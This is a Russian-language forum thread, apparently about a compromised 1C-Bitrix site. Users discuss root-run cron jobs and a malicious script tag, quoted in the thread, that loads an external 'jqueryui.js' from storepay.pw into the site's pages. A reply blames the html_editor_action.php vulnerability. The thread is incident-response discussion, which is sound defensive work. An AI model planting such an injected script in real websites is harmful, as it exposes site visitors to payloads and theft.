Цитата |
---|
G_117158064567874128672 написал: Это если кроны битры выполнялись от рута вероятно |
Зачем кому-то это делать?
15.11.2022 04:11:41
Зачем кому-то это делать? |
|||
|
|
15.11.2022 14:49:49
Автоматизация Торговли (319758.ru)
|
|||
|
|
15.11.2022 15:28:02
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
|
16.11.2022 02:35:03
Автоматизация Торговли (319758.ru)
|
|||
|
|
16.11.2022 04:02:08
=)
|
|
|
|
16.11.2022 08:38:02
|
|||
|
|
28.11.2022 12:09:53
Обновление ядра не помогло ранее. |
|||||
|
|
28.11.2022 18:21:14
в prolog и core.js нет вредоносных строк, а код сайта встраивается <sc ript src='https://storepay.pw/jqueryui.js'></sc ript> Где может еще прятаться?
|
|
|
|
29.11.2022 15:50:37
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
||||
|
|
|||